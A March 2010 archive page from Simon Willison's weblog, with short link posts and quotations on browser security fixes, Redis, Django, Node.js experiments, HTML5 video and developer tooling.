Simon Willison’s Weblog

Items in Mar, 2010

Filters: Year: 2010 × Month: Mar ×

Plugging the CSS History Leak (via) Firefox is fixing the nefarious CSS visited link colour history leak flaw, which currently affects all browsers and allows a malicious site to determine if you have visited a specific site by checking getComputedStyle against a link to that page. It’s an obtrusive but necessary fix—visited link styles will be restricted to colour and border styles (no background images and hence no more checkbox effects since the image request could leak information) and those colours will not be reported via getComputedStyle. I hope other browser vendors follow suit. # 31st March 2010, 8:01 pm

Miss Wilson, when she was a resident superintendent in this Palace, had a cat that apparently caught up to 60 mice a night. The corpses were then swept up in the morning. Finally, does the noble Lord recognise the fire hazard that mice pose, because they eat through insulating cables? It would be a tragedy for this beautiful Palace to burn down for lack of a cat.

Baroness Finlay of Llandaff # 31st March 2010, 4:06 pm

Redis weekly update #3—Pub/Sub and more. Redis is now a publish/subscribe server—and it ended up only taking 150 lines of C code since Redis internals were already based on that paradigm. # 30th March 2010, 3:15 pm

A Turing Machine. Someone finally built a real turing machine—and it’s beautiful. All calculations are carried out on a tape, which has 1s and 0s written on it by a robotic dry-erase marker. Hypnotic. # 29th March 2010, 2:28 pm

Preview: Freebase Gridworks (via) If my experience with government datasets has taught me anything, it’s that most datasets are collected by human beings (probably using Excel) and human beings are inconsistent. The first step in any data related project inevitably involves cleaning up the data. The Freebase team must run up against this all the time, and it looks like they’re tackling the problem head-on. Freebase Gridworks is just a screencast preview at the moment but an open source release is promised “within a month”—and the tool looks absolutely fantastic. DabbleDB-style data refactoring of spreadsheet data, running on your desktop but with the UI served in a browser. Full undo, a JavaScript-based expression language, powerful faceting and the ability to “reconcile” data against Freebase types (matching up country names, for example). I can’t wait to get my hands on this. # 27th March 2010, 6:43 pm

Random Guardian (via) A random page from today’s Guardian, built by Daniel Vydra. # 26th March 2010, 4:47 pm

We’ve got a rule of thumb inside Stamen that issue names must read like imperatives: “improve variable names”, “delete blah functionality”, “fix broken jimmy-jammers”, etc. Nothing focuses the mind of the reporter like being asked to specify what exactly they’d like to see done, and it’s much easier for a developer to scan a list with actual tasks right in the sentence construction.

Michal Migurski # 25th March 2010, 8:09 pm

The Onion Uses Django, And Why It Matters To Us. The Onion ported their main site from PHP and Drupal to Django in three months with a team of four developers, including a full migration of their archived content. Their developers answer questions about the switch in this thread on the Django sub-reddit. # 25th March 2010, 6:43 pm

Video on the Web—Dive Into HTML5. Everything a web developer needs to know about video containers, video codecs, adio containers, audio codecs, h.264, theora, vorbis, licensing, encoding, batch encoding and the html5 video element. # 24th March 2010, 12:50 am

The operations team is the one place with access to data and traffic that is “real-time enough” to detect business issues before they manifest in significant monetary loss. Traffic anomalies, chargeback rates, visitor retention… all these translate into money. This is what ops does; they make things work; they make the business work. And they spend a lot more time trending, investigating and analyzing than they do replacing hard drives and network cards.

Theo Schlossnagle # 24th March 2010, 12:43 am

Side-Channel Leaks in Web Applications. Interesting new security research. SSL web connections encrypt the content but an attacker can still see the size of the HTTP requests going back and forward—which can be enough to extract significant pieces of information, especially in applications that make a lot of Ajax requests. # 23rd March 2010, 4:24 pm

Fun with TextMate and PDB. TextMate bookmarks (against lines in a file) are stored as OS X extended attributes, which can be accessed from Python using the xattr module. Here’s a clever piece of code that uses bookmarks to set breakpoints in the command-line pdb debugger. # 23rd March 2010, 9:48 am

Using Django as a Pass Through Image Proxy (via) Neat idea for running development environments against data copied from a live production site—a static file serving handler which uses a local cache but copies in user-uploaded files from the production site the first time they are requested. # 22nd March 2010, 7:18 am

Fear and Loathing in Farmville. “At multiple times during the conference, [Daniel] James expressed his serious ethical qualms over the path social gaming was laying for the industry. So many of the methods for making money are thinly-veiled scams that simply exploit psychological flaws in the human brain.” # 21st March 2010, 10:13 am Useful dynamic image generator for layout mockups—just drop an image in to a page pointing at Takes optional arguments for text, colour and format as well. # 20th March 2010, 2:32 pm

Each speaker gets five minutes to explain their research, with a human metronome banging a waste bin with a big stick after every minute. After five minutes, an eight-year old girl (last night, actually two twins) walks across the stage and says “Please Stop, I’m Bored” and repeats it until the speaker does indeed stop.

Ian Mansfield # 19th March 2010, 11:07 am

webhook-relay. Another of my experiments with Node.js: webhook-relay is a self-contained queue and webhook request sending agent. Your application can POST to it specifying a webhook alert to be sent off, and webhook-relay will place that request in an in-memory queue and send it on its own time, avoiding the need for your main application server to block until the outgoing request has been processed. # 19th March 2010, 10:17 am

Twitter, reformatted. I wrote a Yahoo! Pipe to clean up Twitter’s RSS feeds—removing the username prefix and filtering out items that begin with “@” or “RT”.. # 18th March 2010, 1:10 am Simple online tool for unpacking and beautifying JavaScript. # 17th March 2010, 10:39 pm

If HTML is just another bytecode container and rendering runtime, we’ll have lost part of what made the web special, and I’m afraid HTML will lose to other formats by willingly giving up its differentiators and playing on their turf.

Alex Russell # 17th March 2010, 10:37 pm

The Web Server Benchmarking We Need. Ian Bicking asks for a WSGI benchmark which emphasises error handling over raw performance—can the server keep serving requests if some of them are CPU bound, I/O bound, wedged or cause a segfault? # 17th March 2010, 10:05 am

We spent $860,000 rebuilding our intranet. The most popular page on the intranet is still the cafeteria menu.

Intranet Secrets # 17th March 2010, 10:02 am

Internet Explorer Platform Preview Guide for Developers (via) Lots of SVG and CSS3 stuff, no mention of canvas here either though. # 16th March 2010, 6:36 pm

grant XXX on * ? (via) PostgreSQL doesn’t have a way to say “this user is allowed to select/update/etc on all tables in database X”. That kind of sucks. UPDATE: This is fixed in PostgreSQL 9, see the comments. # 16th March 2010, 6:26 pm

An Early Look At IE9 for Developers (via) Surprisingly, no mention of SVG or canvas and only a note in passing about HTML 5. # 16th March 2010, 6:11 pm

VMware: the new Redis home. Redis creator Salvatore Sanfilippo is joining VMWare to work on Redis full time. Sounds like a good match. # 16th March 2010, 11:26 am

Automated deployments with Fabric—tips and tricks. “If it’s not in a Fabric fabfile, it’s not deployable”—I’m slowly applying this philosophy to my personal projects. # 16th March 2010, 11:19 am

Why Google MapMaker is not Open. Non-commercial use only, strict attribution requirements and you aren’t allowed to use the data for services that might compete with Google. This is why I’m disappointed every time I see Google encouraging people to contribute to Map Make, especially in the developing world—if those people contributed to OpenStreetMap instead they would be building something far more valuable for their community. # 16th March 2010, 10:41 am

Installing PIL on Mac OS X Snow Leopard for use in Google App Engine. PIL installation instructions that actually work... the ’export CC=“gcc -arch i386”’ incantation in particular. Make sure you run install using the Python version that the App Engine dev tools are using (I ran “sudo /usr/bin/python2.6 install”). # 15th March 2010, 4:06 pm